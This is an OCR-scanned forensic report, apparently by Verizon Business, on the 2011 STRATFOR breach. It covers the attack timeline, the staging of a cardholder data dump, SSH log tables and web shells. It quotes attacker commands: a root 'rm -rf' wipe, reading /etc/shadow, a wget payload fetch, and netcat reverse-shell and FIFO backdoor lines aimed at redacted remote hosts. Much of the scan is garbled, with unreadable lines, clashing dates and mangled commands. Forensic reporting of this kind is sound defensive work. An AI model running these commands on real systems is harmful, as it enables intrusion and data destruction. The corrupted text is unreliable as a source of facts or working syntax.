numbers during the time-frame of the attack. Those IP addresses have been forwarded to the 
FBI for the purposes of their investigation. 

• Verizon confirmed that unauthorized external SSH connections were made to the STRATFOR 
environment by the IP address ^^^^^^^H, originating in Massachusetts. This IP address 
has been forwarded to the FBI for the purposes of their Investigation. 

• Verizon confirmed that the database dump file containing cardholder data was not present on 
the database server itself. However, Verizon identified the database dump containing 
cardholder Information on the Zimbra mail server. This finding corroborates that the database 
dump was piped from the database server to the Zimbra mail server on its way to exfiltration 
from the STRATFOR environment. 

• Verizon identified a potentially malicious file called "sflnd.exe'' on a Web-facing Windows active 
directory server. It is unclear whether this potential malware is related to the data breach event 
known to have occurred. 

• In analyzing remnant unallocated disk space on the affected servers, Verizon discovered several 
instances of unauthorized intruders running at least three different unknown and unauthorized 
scripts. These were associated with the specific IP addresses ^^^^^^^H and 
^^^^^^H in both syntax arguments as well as target output destinations. These IP 
addresses have been forwarded to the FBI for the purposes of their investigation. 
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5.1 . Known Attack Timeline of Events 



The following timeline of evenfs details specific acflons taken by the Intrucler(s), leading up to the 
compromise of sensitive cardholder data from the 8TRATFOR environment. Unless othen/vise specified, 
all times are documented in Central Standard Time (CST): 



Attack Timeline o1 Events: 


Date 
Sep 29, 2011: 


Activity 

This date represents the earliest known date of intrusion into the STRATFOR 
environment. On this date, the intruder(s) initiated a brute force attack against a 
specific employee end-user account the STRATFOR office environment. The result 
of this brute force attack was a successful SSH log-in into the STRATFOR SMTP 
mail server on October 3, 201 1 . 


Nov 16, 2011: 


On this date the data dump file containing cardholder infomiation from the 
STRATFOR database sen/er is created on the Zimbra mail server. 


Dec 5, 2011: 


Starting at 4:37 p.m. CST, an abnormally high amount of data is sent from the 
STRATFOR environment over a non-standard and unassigned port (port numt}er 
9583 to destination port 41216) to the IP address ^^^^^^M The data 
download lasts approximately 9 minutes and concludes at 4:46 p.m. CST. 


uec D, zui 1 : 


b 1 HA 1 rUn oecomes aware oi a poieniiai oaia nreacn eveni wnereuy caranoiaer 
information was exfiltrated from their environment. 


Dec 7, 2011: 


The Federal Bureau of Investigation provides all known at-risk cardholder 
information to the respective card brands. Also on this date a second high volume 
aaia iransrer occurs rrom ine biriAirUn environment lo an ir aaaresSj 
in Greece. Once again the transfer occurred over a non-standard 
and unassigned port (port number 59630 to destination port 47608). The data 
transfer lasts a little over 2 hours, between 9:37 a.m. and 1 1 :47 a.m. CST. 


Dec 9, 2011: 


An unauthorized login via SSH occurred at 19:52:35 to the STRATFOR SMTP mail 
server from an IP address, ^^^^^^^H originating in Massachusetts. This IP 
address is also associated with executing several scripts via the Web based front- 
end of the STRATFOR Web and Zimbra servers which facilitated backdoor remote 
access. 


Dec 24, 201 1 : 


Unauthorized intruders successfullv deface the www.STRATFOR.com website and 
shortly thereafter disable the Web server and two separate mail servers using the 
Unix command "rm -rT as a superuser in the root directory. This causes the 
contents of nearly every writable mounted file system on the servers to be deleted. 


Dec 25, 2011: 


On this date, portions of the stolen dataset, including cardholder information, are 
publicly posted to the Internet by individuals claiming allegiance with the hacking 
group Anonymous. 


Dec 30, 2011: 


STRATFOR engages Verizon Business to conduct a lorensic investigation into the 
unauthonzed activity affecting their systems environment. 


Jan 3, 2012- 
Jan 26, 2012: 


Dunng this timeframe Verizon Business worked with STRATFOR personnel and the 
FBI during three separate on-site visits to acquire digital evidence sources relevant 
to the case. 



Table 5.1 .1 - Attack Timeline of Events 
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5.2. Antf-Forensfc Measures 

After dejacing the www.3TRATFOR.com website on December 24, 2011 the unauthorized intruder(s) 
used the Unix command "rm -rT' as superuser in the root directory of the Web and database servers as 
weii as two separate affected maii servers. The Unix command "rm" is used to deiete fiies and foiders 
from a directory. The "-r" argument recursively removes aii directories and sub-directories from the 
system and the M'' argument forcibiy deietes aii fiies and foiders (write-protected or not) from the system. 
What this means is that when the intruder{s) ran the "rm -tf' command from the root directory, the 
systems began deleting ail files and lolders from their respective hard drives until the point where system- 
critical files and/or directories were deleted. This one command helped to remove the intruders' "digital 
footprints" from the compromised systems and proved to be an investigative challenge, as standard file 
timeline and metadata analysis could not be conducted. 

The execution of Ihe "rm -rT command was compounded upon the lacl< of network log data maintained 
by STRATFOR during the timeframe of the data breach event, the lack of a centralized logging system to 
capture remote access instances into the STRATFOR environment, and the fact that the majority of the 
logs that did exist were deleted from the in-scope systems prior to the systems being destroyed by the 
'Ym -rT' command. When the intruder(s) defaced the www.STRATFOR.com website, the defacement 
included the "rm -rT commands run against the Web server. Specifically, one of the "rm -rf" commands 
was run against the /var/log/ directory. This command would have deleted all of the relevant log data 
from the Web server. Verizon Business found no evidence to support that the "rm -rT command was run 
against that specific directory on the other servers, but it is highly likely to have occurred given the 
absence of days, and in some cases weeks worth of log data from those systems. The absence of these 
log files constituted another unique set of challenges to investigators as log files provide a significant 
amount of information that can aid in a data breach event. Infomiation such as user name, IP address, 
date, time, and the relative success or failure unauthorized access attempts would typically be captured in 
such logs. This information can often help to determine the scope and number of systems that have been 
breached as well as provide significant dates and times in which the breach occurred. 

Lastly, for much of their malicious activity (although not all), the intruder(s) utilized an anonymizing 
service, TOR in particular, to obfuscate any data being transmitted from the STRATFOR environment 
from being recognized through standard network traffic analysis. TOR (short for The Onion Router) is a 
free software program that uses a volunteer network of servers to route Internet traffic through myriad 
servers in order to conceal a users internet activity. To do this, the TOR software obtains a list of TOR 
nodes (or servers) from a directory server. The software then creates a path from the originating system, 
through a random sampling of TOR nodes, to the final destination. The path is a circuit of encrypted 
connections from one server In the network to another. To put it another way, if is a series of "hops" that 
act as go-betweens connecting the source system to its destination. By creating this random path from 
the source to the destination TOR effectively anonymizes the source system from the destination. The 
net effect is that, in the case that log data exists on the destination machine, any network logs will show 
traffic coming from the TOR exit node IP address and not the source system's IP address. The 
screenshot below, from the TOR website, is a diagram explaining how TOR works. 
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^ How Tor Works: 2 



Tornotfa 

. . unoncEYptad link 



Alice 




Step 2: Alice's Tor client 
picks a random path to 
destination server Green 
Unks are encrypted, red 
links are in the clear. 



Dave 







Jane 





Figure 5.2.1 - Figure Explaining TOR Functionality^ 



Engaging in this degree of anti-torensic activity indicates the high ievei of sophistication and organization 
driving the intruder's actions. Many intruders in simiiar cases make no effort to "cover their tracks" or 
otherwise obfuscate their actions. Taking specific and deliberate actions that hinder investigative efforts 
after the fact is indicative ot a highly specialized, and professional attacker or group of attackers. 

5.3. Payment Card Exfiltration 

As a primary focus of this investigation, Verizon was tasked with not only working to enumerate the scope 
of exposed cardholder data, but also to determine the nature of its exfiltration from the 3TRATF0R 
environment. To that end, Verizon investigators began this task by working to determine whether the 
database dump file, created with the MySQLdump utility existed or was created on the database server 
itself (^^^^^^^^^^1 in the network architecture diagram above). This involved parsing the 
database server for specific cardholder accounts in the data dump file as well as randomly selected literal 
strings from the database dump. At the end of this exercise, Verizon did not discover any evidence to 
suggest that the database dump was created on, or ever existed on the database server itsell. 

As a direct consequence of that finding, Verizon shifted its focus on determining the system or server 
within the 3TRATF0R environment on which the database dump file was created and staged for 
exfiltration. Given that there was no network segmentation by access restrictive firewall between the e- 
commerce and corporate environments, Verizon began the task of searching lor remnant evidence of the 
data dump file across all in-scope forensic images. At the conclusion of this analysis, Verizon confirmed 
that the database dump had existed on the Zimbra mail server (^^^^^^^^^^^^^^^^^^^B 
and was staged there prior to exfiltration. The screenshot below shows a segment of the data dump file 
extracted from unallocated space on Zimbra mall server after it had been issued an rm -rf command by 
the attackers. 



Source: https 7/www. lorproject. org/about/o veTview.htm l.en . 
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{^TqhO. '^Hex h^Dqc ^Trarscript Q PicfuFe Report 3 Console :9Det=jH< ^ Outpift □ Lock □ Codepage □ 0/16 
46291SE4SeS£ET character set clierit = Qsaved cs client^- ifi 



'34629 
34629 
34629 
34629 
34629 
34629 

.34629 
34629 
34629 
34629 
34629 
34629 
34629 
34629 
34629 



1554665 
1554730 
1554731 
1554734 
1554796 
1554789 
1554790 
1554S54 
1554934 
1555014 
1555094 
1555174 
1555254 
1555334 
1555414 
1555494 
1555574 



.'Credit; card decli 



-- I>u]iipuig datra tor trable ^uc order adnui coimentf'' 



/'^"40000 ALTEE TABLE ' uc__order_adiiin_coiuient=- DISABLE KEYS */; 
I^fSEPT lino ^uc_ order_adain_CQiimentr3^ VALUES f l 

?ffTy^y ??QrB) ~Tjit-h AEC code <ea>OE</ea> and HBC code <eiii>00</eiii> . ' ,| 
, 'Credi t card decl ined for $199.00 uith AftC code <em>Ci&</eiii> an 

d fi£.C code <em>00</em>. , (^^^^^^^^^^^H '^'^^'^i^ card successfully 

charged <eni>f 19. 9S</em> oi^transactioi^<en>04H6gZDim with approva 

code <ea?-022£ll</ea^. ' ,^^^^^^^^^^^^^^^^^^^^^[' Cred it card declined tor 
^49. OQ ^ith AIeC code <em>51</em> and MKC code <eiii>00</em> . ' 

9,0, 'Credit card successfully charged <eii>f 19. 95</eiii> on transaction <en>0576TiTTB 
£O0P09f11I>T£Y</e&> vith approval code <em>^| 



Credit card successfully charged <e&>$l9. 95</eiii> on transaction <eiii>0516IiTTB£3DDIl 



1 1^ r* ■ 



Figure 5.3.1 - Screenshot of Database Dump File on Zimbra Mail Server 



This finding corroborates ttiat the database dump was piped from the database server to the Zimbra maii 
server (such that it was never actualiy written to disk on the database server) on its way to exfiitration 
from the STRATFOR environment. This evidence iiiustrates the database dump was moved from the 
payment environment to the office environment before being stoien from the STRATFOR environment. 
This finding highiights the inherent probiems around the lack of network segregation between the 
corporate STRATFOR environment and the payment and e-commerce environment. Given that this fiie 
was staged for exfiitration from the office ^^^^^H subnet) environment, evidence suggests that it 
was aiso extracted by the attackers from that environment and not the e-commerce (^^^^^H subnet) 
environment. 



As a comparison the foiiowing screen capture shows the correiating text extracted directiy from the 
exfiitrated data dump fiie itself. 



/*f*30090 ALTER TABLE ^uc_crder_adinin_cOri[iien-t5^ DISABLE KEYS */; 
INSERT INTO ^uc_Qrder_ddniin_c:oiiimeni&^ VALUES ^^^^^^^^^1' C r edit Cdrd decll 
ned for ^B4S.0@ with ARC code (eni>@E</eEi7 dnd r^RC code <eiii>6@^/eFi> .^^^^^^^H 
■■^^^^^^■^H ' Credit cdrd declined for $1S3,2G! lulth ARC code <:eni^0E</eir> dn 

charged -em-' j'?' /em-' on transaction <em>Q4H6WZDLimES77i^PQRVLi/en> with approva 

^9.00 Mith ARC rode ^en^Ei^/em^ and nrc rode /.em^m Oem^^^^^B^^^Hf^^^M 

3,e, 'credit card successfully charged <en>*i9.95</eir> on transaction ce[i>057€WTB 

credit card successfully ctiarged *eni>ii9.9B</eri> on transaction <ein>05i6WTBE3Diw 


1 






Search fkR^lace ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^= 




— _|x 




Find R,.t - Next Previous ^1 a ^ - 1 ^ ^ Q. P 


105 'HB 


-9 







Figure 5.3.2 - Screenshot of Exfiitrated Data Dump Excerpt 



At the conclusion of Verizon's analysis of the network architecture at the time of the data breacfi event, 
investigators determined that gaining unautfiorized system-level access to any of tfie systems outlined in 
corporate STRATFOR environment would also grant an attacker access to the e-commerce environment 
and vice-versa. The discovery of the database dump file wiftiin the corporate office environment 
corroborates ttiat finding, and strongly suggests ttiat although this data was originally stolen from a 
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system within ttie e-commerce environment, i! was actually exfiltrated ttirough tiie STRATFOR office 
environment. 

5.4. Unauthorized SSH Connections 

Given ttiat the file systems of the relevant in-scope systems were deleted, and no file structure was 
present within the acquired forensic images, Verizon Business parsed the entire hard drive contents of 
the examined systems for remnants of log data that would indicate remote access had occurred. In 
analyzing this log data, specilic attention was paid to activity around the timetrame surrounding the dates 
of known malicious activity occurring within the STRATFOR environment. 

5.4-1- SSH Connections to Web Server (www.STRATFOR.com) 



From within unallocated space, Verizon Business was able to identify 122,544 successful SSH 
connections with valid date ranges to the STRATFOR Web server. The user accounts, IP addresses, 
connection counts, and date ranges associated with these successful SSH connections are shown below: 



IP Addresses 



autobol 



kevin.garry 



matt-vance 



ngeron 



root 




Total Connections 


Date Range | 




1 ?/1 6/11 - 1 ?/?4/1 1 




n4/i 1—1 ?/i fi/1 1 

UH-y 1 \jI II 1 cJ 1 \jI I 1 


-1 
1 


1P/13/11 - IP/13/11 

1 • ' 1 \Jl II 1 C-l 1 \JI 1 1 




1 P/08/1 1 — 1 ?/1 6/1 1 

1 C-I\J\JI II 1 C-l 1 \JI 1 1 


7 


12/08/11-12/12/11 


5 


12/16/11-12/23/11 


4 


12/23/11-12/23/11 


1 


12/23/11-12/23/11 


2 


12/23/11 -12/23/11 


2 


12/17/11 -12/18/11 


2 


12/15/11-12/15/11 


20 


12/08/11-12/23/11 


2 


12/15/11-12/15/11 




12/16/11-12/16/11 




12/09/11-12/09/11 




12/09/11-12/09/11 




12/16/11-12/16/11 




12/09/11 -12/09/11 


3 


04/24/11 -06/06/11 


55 


04/22/11-12/15/11 
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steve.elkins 






7 


12/08/11-12/22/11 




2 


12/14/11 -12/14/11 



Table 5.4.1.1 - Successful SSH Connections to STRATFOR Web Server 



The IP addresses associated with these connections were reviewed with the FBi and STRATFOR iT 
security personnel, it was determined ttiat the majority of these connections occurred from within the 
STRATFOR internal network. Due to the lack of firewall logging, connections sourced from within the 
internal STRATFOR network could not be correlated to any specific system within the STRATFOR 
enterprise. One connection from IP address ^^^^^^^H which occurred via the "root" account on 
December 9, 2011 (highlighted in red above) at 19:52:35 was deemed unauthorized. 



Within the available log data carved from unallocated space, a total of three attempts to access to 
STRATFOR Web server via invalid user accounts were observed. These failed attempts could not be 
correlated to any malicious activity based on the available evidence. The details of these connections are 
shown below. 



1 User 


IP Addresses 


E}ate/Time | 


rott 






04/26/11 08:55:26 


rot 




06/06/11 15:37:12 


autbot 




12/13/11 15:48:06 



Table 5.4.1.2 - SSH Attempts via Invalid User Accounts to STRATFOR Web Server 



A total of seven failed password attempts were observed with in the log data extracted from the 
STRATFOR Web server's hard drives. These failed password attempts all occurred from within 
STRATFOR's office portion of the network. The details of these failed password attempts are shown 

below: 



User 


IP Addresses 


Date /Time 


ngeron 






12/12/1213:11:17 




12/19/12 11:02:02 


root 






12/08/12 20:53:14 




12/08/12 20:53:21 


steve.elkins 






12/22/12 14:43:13 




12/08/1216:30:24 




12/08/12 20:53:49 



Table 5.4.1 .3 - SSH Failed Password Attempts fo STRATFOR Web Server 



Given that the office portion of the STRATFOR network was behind a router which used network address 
translation (NAT), the systems from which these connections originated from could not be determined or 
examined due to the lack of log data from network witness devices such as a perimeter firewall. If is 
recommended that STRATFOR expand their logging capabilities such that activity from within the office 
portion of the network could be correlated to specific systems. 
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5.4-2- SSH Connections to SMTP Server (smtp.STRATFOR.com) 

A lotal of 484 successful SSH connecfions witfi valid date ranges were extracted from wittiln the 
unallocated space of the compromised STRATFOR SMTP server's hard drives. These successful logins 
occurred betv^een January 4, 201 1 and December 30, 2011 via 12 unique user accounts. The details of 
these connections are shown below: 



User 


IP Addresses 


Connection Count 


Date Range 


chase.hoHman 






2 


10/04/11-12/07/11 


d.ancll 






33 


10/04/11 -12/02/11 


doug.ancil 






2 


10/03/11 -10/04/11 


Iginac 






5 


11/16/11-11/17/11 


kevin 






7 


09/26/11 -12/06/11 






3 


09/24/11-10/11/11 


m.vance 






2 


10/04/11-10/04/11 








18 


05/03/11 -09/21/11 


matt.tyler 






1 


05/06/11 -05/06/11 








1 


06/02/11 -06/02/11 


matt,vance 






3 


09/20/11 -09/21/11 


mlkeTh/as 






19 


09/30/11-11/22/11 








3 


01/13/11 -07/15/11 


mooney 






1 


09/09/11 -09/08/11 






1 


05/12/11 -05/12/11 








21 


01/15/11 -09/02/11 








3 


11/08/11-11/25/11 


ngeron 






74 


10/11/11-12/07/11 






4 


10/11/11-11/14/11 








16 


11/06/11-11/25/11 


root 






6 


09/19/11 -09/23/11 








9 


09/26/11 -09/30/11 








4 


04/21/11 -11/13/11 








19 


04/08/11-12/30/11 








2 


10/21/11-10/21/11 








3 


03/04/11 -09/30/11 
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fb 


01/13/1 1 — l^Wu/1 1 




1 o 

1 yi 


f\-\ !f\A /i 1 nO/OQ/i 1 




7 


01/07/11 -10/13/11 




19 


05/03/11-10/26/11 




3 


04/23/11 -04/23/11 



Table 5.4.2.1 - Successful SSH Connections to STRATFOR SMTP Server 



The IP addresses associated with these successtui iogins were reviewed with STRATFOR rr security 
personnei, and were not deemed suspicious in nature, most at which occurred from within the 
STRATFOR enterprise. It is important to note that whiie on-site investigators interviewed the STRATFOR 
iT empioyee Doug Ancii, whose successtui SSH connections are highiighted in red above. This 
empioyee stated to investigators that he never attempted to access to STRATFOR SMTP server via SSH, 
nor wouid he ever have any business reason to. Therefore the iogins associated with this user were 
deemed suspicious and unauthorized. These iogins occurred from within the STRATFOR office networl<, 
and couid not be correiated to a specific system. Additionaiiy, aii STRATFOR empioyee worl^stations 
were rebuiit prior to Verizon Business' involvement in this investigation, therefore these unauthorized 
connections couid not be investigated further based on the available evidence. 

This user opened a superuser session to root 26 times between October 4, 201 1 and December 2, 201 1 . 
The details of these privilege elevations are shown in the following log excerpt: 

Oct 4 15:09:18 smtpsu[8761]: Successful su for root by d.ancil 
Oct 11 16:10:34 smtp su[31415]: Successful su for root by d.ancil 
Oct 17 08:58:55 smtp su[1195|: Successful su for root by d.ancil 
Oct 21 1 1 :01 :15 smtp su[20077|: Successful su for root by d.ancil 
Oct 24 12:18:18 smtp su[29492|: Successful su for root by d.ancil 
Oct 24 14:24:13 smtp suI589]: Successful su for root by d.ancil 
Oct 25 09:39:10 smtp suI1048]: Successful su for root by d.ancil 
Oct 25 13:46:51 smtp suI8395|: Successful su for root by d.ancil 
Oct 27 10:37:42 smtp suI29648|: Successful su for root by d.ancil 
Oct 31 10:59:58 smtp suI16924|: Successful su for root by d.ancil 
Oct 31 12:59:48 smtp suI20960|: Successful su for root by d.ancil 
Nov 1 08:28:10 smtp suI24437]: Successful su for root by d.ancil 
Nov 1 09:13:57 smtp suf25550]: Successful su for root by d.ancil 
Nov 1 14:00:32 smtp SUI1844]: Successful su for root by d.ancil 
Nov 1 1 16:34:58 smtp suI32384|: Successful su for root by d.ancil 
Nov 15 08:46:06 smtp suf13935]: Successful su for root by d.ancil 
Nov 15 09:13:18 smtp suI15145|: Successful su for root by d.ancil 
Nov 15 13:46:23 smtp suI22215|: Successful su for root by d.ancil 
Nov 18 15:25:43 smtp suI23079]: Successful su for roof by d.ancil 
Nov 23 1 1 :19:57 smtp suI8686|: Successful su for root by d.ancil 

Dec 2 16:59:00 smtp sudo: pam_unix(sudo:session): session opened for user root by d.ancil(uid=0) 
Dec 2 17:00:13 smtp sudo: pam_unix(sudo:session): session opened for user root by d.ancil(uid=0) 
Dec 2 17:00:26 smtp sudo: pam_unix(sudo:session): session opened for user root by d.ancil(uid=0) 
Dec 2 17:08:43 smtp sudo: pam_unix(sudo:session): session opened for user root by d.ancil(uid=0) 
Dec 2 17:08:58 smtp sudo: pam_unix(sudo:session): session opened for user root by d.ancil(uid=0) 

Table 5.4.2.2 - Elevation to "root" by "d.ancil" 

Other user accounts at STRATFOR were also observed elevating to "root" however the nature of these 
escalations could not be determined based on the avaiiabje evidence. Based on this analysis it is 
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determined that unauthorized and privileged remote access occurred to the 3TRATF0R SMTP server 
between October 3, 201 1 and December 2, 201 1 . 



Within the unaiiocated space o1 the 3TRATFOR SMTP server, investigators observed 95 attempts to 
access 13 unique invalid user accounts via 33H. The details of these attempts are shown below: 



User 


IP Addresses 


Attempt Count 


Date Range 


chase.hofiman 






7 


10/04/11-10/04/11 


dancii 




17 


10/10/11 -11/08/11 


doug.ancil 




38 


09^9/11 -10/04/11 


dougancil 




10 


10/10/11 -10/10/11 


Iginac 




4 


11/16/11 -11/16/11 


l<evin.garry 




2 


09/24/11 -09/30/11 


matt,vance 




9 


09/26/11-10/04/11 


matlvance 




1 


09/21/11 -09/21/11 


mtyler 




2 


08/30/11 -08/30/11 


ngeron 






3 


10/10/11-10/10/11 




1 


10/10/11-10/10/11 


nicholas.geron 




6 


10/10/11-10/10/11 


Steve. elkins 






1 


10/19/11 -10/19/11 




6 


10/03/11-12/07/11 




1 


09/25/11 -09/25/11 


zimbra 




5 


03/25/11 -05/23/11 



Table 5.4.2.3 - SSH Attempts via Invalid User Accounts to STRATFOR SMTP Server 



The iP addresses associated with these iogins appear to be iegitimate, as they aii occur Irom within the 
STRATFOR enterprise. Due to the iarge amount of invaiid attempts (highlighted in red above) for user 
''doiig.ancil," investigators interviewed STRATFOR empioyee Doug Ancii, who explained to Verizon 
Business that he never attempted to access any systems at STRATFOR via SSH, including the in-scope 
servers. These invalid user access attempts suggest that a breach may have taken place within the 
office portion of the STRATFOR network as early as September 29, 2011. Similarly a significant amount 
of failed password attempts occurred by this user account. Due to lack of logging, and the fact that all 
user workstations at STRATFOR were rebuilt prior to Verizon Business' involvement in this investigation, 
no further details on the cause of these suspicious accesses could be determined based on the available 
evidence. 

A total of 131 failed SSH password attempts from six unique user accounts were observed within the log 
data carved out of the unallocated space from the STRATFOR SMTP Server. The details of these failed 
password attempts are shown below: 
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User 


IP Addresses 


Failure Count 


Date Range 


chase.hoflman 






4 


12/07/2011 - 12/07/2011 


d.ancil 




50 


10/10/2011 - 12/02/2011 


mike.rivas 






4 


10/04/2011 - 11/22/2011 


mooney 




1 


05/12/2011 -05/12/2011 


ngeron 






28 


10/11/2011 -12/07/2011 


root 




1 


09/20/2011 -09/20/2011 




40 


09/30/2011 -10/10/2011 




2 


10/04/2011 - 10/04/2011 




1 


10/13/2011 - 10/13/2011 



Table 5.4.2.4 - SSH Failed Password Attempts to STRATFOR SMTP Server 



Consistent with ttie unauttiorized access via account "d.ancir described previousiy, a significant amount 
of faiied password attempts (tiighiigtited in red above) occur to the STRATFOR SMTP server via user 
accounts "^d.ancii," "ngeron," and ''root.'' The dates at which the majority of faiied password attempts 
occur are consistent tor ttiese ttiree accounts, suggesting that the STRATFOR office networl< 
environment i^^^^^^B suffered a security breach. 

5.4.3. SSH Connections to Zimbra Server {core.STRATFOR.com) 

A total of 662 successfui SSH connections witti vaiid date ranges were extracted from within the 
unaiiocated space of ttie compromised Zimbra server's hard drives. These iogins occurred via 1 1 unique 
user accounts from 35 unique IP addresses. Verizon Business' review of these connections did not 
reveai any evidence of unauttiorized SSiH connections based on ttie iP addresses, user account, and the 
date ranges of access. A detaiied iist of IP addresses and user accounts associated witti inbound SSH 
access to the STRATFOR Zimbra server can be furnished by Verizon Business upon request 

Between Aprii 29, 2011 and December 21, 2011 Verizon Business observed 6,439 attempts to access 
2,161 invaiid user accounts via SSH to the STRATFOR Zimbra server from 39 unique IP addresses. No 
correiation between these access attempts and this data breach couid be determined based on the 
available evidence. A detaiied iist of the iP addresses and user accounts attempted via these accesses 
can be furnished by Verizon Business upon request, 

A total of 5,025 SSH faiied password attempts were observed from the recoverabie iog data carved from 
unaiiocated space of the STRATFOR Zimbra server These faiied password attempts occurred from 56 
unique iP addresses and attempted to iogin to 36 unique accounts between Aprii 29, 2011 and December 
7, 201 1 . Verizon Business' review of these connections did not Indicate any reievance to the data breach 
investigated. A detaiied iist of the accounts attempted and IP addresses associated with these faiied 
password attempts can be produced by Verizon Business upon request. 
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5.5. Use of Malicious Scripts 

Within unallocated space of ttie in-scope systems, investigators identified references to the usage of two 
potentialiy malicious scripts. Due to the state of the systems at ttie time of forensic investigation, Verizon 
Business could not analyze the contents of ttiese scripts. Given ttie lack of timestamps and file structure, 
Verizon Business could not adequately ascertain whether or not ttiese scripts were introduced into the 
STRATFOR environment by the attacker(s) or if they were legitimate Web front-end scripts that were 
exploited. 

5.5.1 . Malicious Perl Script - bcc.pl 

Investigators identified references to a potentially malicious Perl script ''bcc.pl" in the unallocated space of 
the STRATFOR Web server (www.3TRATFOR.com). The contents of the file referencing this malicious 
script could not be identified. The command line executing this script is shown below: 



sh-C'Cd 'A/ ar/tfvww/vhosts/w ww . STRATFO R.co m/s ite s/al I/the mes/zen/STR ATFO R/i m age s/el oqu a_i m ag es/. im age s ' ; 
perl bcc.pl ^^^^^^18080 

Table 5.5.1.1 - Usage of "bcc.pl" 

A total of seven references to the execution of this script were found in the unallocated space ot the 
STRATFOR Web server. Reviewing this data suggests that the attacker executed the Unix shell, 
changed to the working directory 7var/www/vhosts/www.3TRATFOR.com/sites/all/themes/zen/ 
STRATFOR/images/eloqua_ images/.images," and executed the script ^bcc.pl" with Perl, providing the 
arguments ^^^^^^^^|d080.'' The arguments to this Perl script suggest that ^^^^^^^His an 
IP address, and 8080 is a destination port. If is important to note that IP address ^^^^^^^B is also 
associated with unauthorized intrusion to the STRATFOR Web server on December 9, 2011. 

Three references to this script were identified in Apache logs can/ed out from the unallocated space of 
the STRATFOR Web server. Analysis of this log data indicates that an attacker also executed this script 
remotely. The IP address associated with accessing this script via the STRATFOR Web server's Apache 
interface is also ^^^^^^^B The following Apache log excerpts demonstrate the successful 
accesses (with response code 200) to this script from IP address ^^^^^^^H 
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Table 5.5.1.2 - Access of "bcc.pl" through Web Interface 



Based on these Apache log excerpts it is apparent that the attacker executes this script through another 
PHP script named ''db_con.php" on December 9, 201 1 at 7:40 pm CST, The attacker then uses this PHP 
script to delete both ''db_con.php" and "bcc.pi" on December 10, 2011 at 1 :10 pm CST. Based on open- 
source research conducted by Verizon Business, it is suspected that this Perl script uses system ievei 
commands to establish a backdoor by opening a Unix sheil with "root" priviieges on a remote system that 
is running Unix netcat in listening mode. Details on the introduction of this script into the STRATFOR 
environment could not be determined based on the available evidence. 

5.5.2. Malicious PHP Script - db_con.php 

Reviewing accesses to the PHP script '*db_con.php," within the Apache logs extracted from the 
unallocated space of the STRATFOR Web server suggests that this script is a PHP based file manager, 
and was used to execute system level commands by the attacker. All usage ot this script within the 
recovered log data occurred between December 9, 2011 and December 10, 2011 from IP address 
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Table 5.5.2.1 - Access of "db_con.php" through Web Interface 

The above excerpt shows the attacker accessing the current user's ^bash_history," accessing flies 
"/tmp/pt.tar.gz," 7tmp/pt1Tar.gz," "key.txt," and "pipe.sh." Further review of accesses to this PHP script 
revealed the attacker executing the "id" command, and running ''nc" (Unix netcat) through this script. 



Table 5.5.2.2 - Access of ''db_con.php'' through Web Interface 

Reviewing the usage ol this PHP script suggests that the attacker had system ievei access to the 
STRATFOR Web server as eariy as December 9, 201 1 by accessing this PHP script through the server's 
Web interface. A review of unaifocated space reveaied evidence that this script was downioaded from IP 
address ■■■■■■■ on December 12, 2011 at 5:15 pm CST. The foiiowing excerpt of data from 
unaiiocated space shows output consistent with the Unix command '^vget" demonstrating that this script 
was downloaded via "http://^^^^^^^H/db_con,php." Unfortunately, this script is no longer hosted at 
this location and could not be retrieved and reviewed by Verizon Business. 



Table 5.5.2.3 - Download of "db_con.php" to STRATFOR Web Server 
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5.5.3. Malicious Java Script- z.jsp 

Unauthorized access to ttie STRATFOR Zimbra server was observed ttirougti accesses to Ilie malicious 
script ''z.jsp'' from this server's Web interface, Whetfier or not this script was introduced onto the systems 
by the attacl<ers or is a vuinerabiiity tfiat was expioited could not be determined based on tfie available 
evidence. This script enabled full sfieil level access to the attackers through the Web interface on the 
STRATFOR Zimbra server. A total of 128 accesses to script from 19 unique IP addresses were observed 
between December 1 7, 201 1 and December 21 , 201 1 in the recovered Apache logs from the STRATFOR 
Zimbra server. 

A sampling of the significant system level commands run by the attacker through this backdoor channel 
are shown in the below log excerpt. 



Table 5.5.3.1 - Samples of Commands Ran via "z.jsp ^ 

The first of these commands (run by IP address ^^^^^^^H)' "pwd; id'' would first display the current 
working directory to the user, and then display the currently logged in user's account details. The second 
of these commands (run by IP address ^^^^^^H) would display the contents of the file 
"/etc/shadow" to the user. The file could be used to attempt password cracking. The third of these 
commands (run by IP address ^^^^^^H) would execute Unix netcat via "no ^^^^^^H 3092 -e 
/bin/sh &" which would in turn establish a TCP connection to host ^^^^^^H on port 8092 and 
execute a 7bin/sh" (a standard shell) on the remote system upon connection. The fourth command (run 
by IP address ^^^^^^H) translates to ^'mknod /tmp/b p nc ■■■■■■■8089 0 < /tmp/b I 
/bin/bash 1 > /tmpyb." This command would create a special FIFO (first in, first out) device in path 
'7tmp/b'' which would act as a pipe. This command woufd then establish a backdoor to the system 
through this pipe, opening a local shell via Unix netcat on the remote system with IP address 
^^^^^^^■that is listening for netcat connections on port 8089. This would allow an attacker to 
interface with the STRATFOR Zimbra server directly from a remote system of their choice; in this case 
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Reviewing the activity associated witti ttiis malicious script revealed evidence of file creation, deletion and 
data translers. It is suspected ttiat sensitive information was compromised from this server via this 
backdoor channel. Additionally, this bacftdoor ctiannel facilitated password crachiing of all accounts on 
this system, as it allowed the attacker to access to 7etc/stiadow" file. The details of the iP addresses 
associated with connections via ttiis backdoor channel to the STRATFOR Zimbra server are shown 
befow: 



iP Address 


Access Count 


First Connection 


Last Connection 






6 


12/17/2011 04 36 52 


12/17/2011 07 23 00 






1 


12/17/2011 05 4211 


12/17/2011 05 42 11 






1 


12/17/2011 02 56 27 


12/17/2011 02 56 27 






2 


12/17/2011 0814 23 


12/17/2011 08 1543 






12 


12/17/2011 05 47 44 


12/17/2011 05 50 45 






1 


12/17/2011 06 01 40 


12/17/2011 06 01 40 






1 


12/17/2011 02 46 59 


12/17/2011 02 46 59 






49 


12/17/2011 01 47 00 


12/21/2011 17 03 10 






1 


12/17/2011 04 37 46 


12/17/2011 04 37 46 






5 


12/17/2011 08 21 59 


12/17/2011 08 26 59 






10 


12/17/2011 05 26 41 


12/17/2011 05 33 17 






18 


12/17/2011 01 45 46 


12/17/2011 05 48 01 






1 


12/17/2011 08 09 43 


12/17/2011 08 09 43 






2 


12/17/2011 08 32 50 


12/17/2011 08 33 10 






7 


12/17/2011 0614 56 


12/17/2011 06 18 15 






4 


12/17/2011 04 44 57 


12/17/2011 04 46 35 






3 


12/17/2011 0413 57 


12/17/2011 04 14 43 






2 


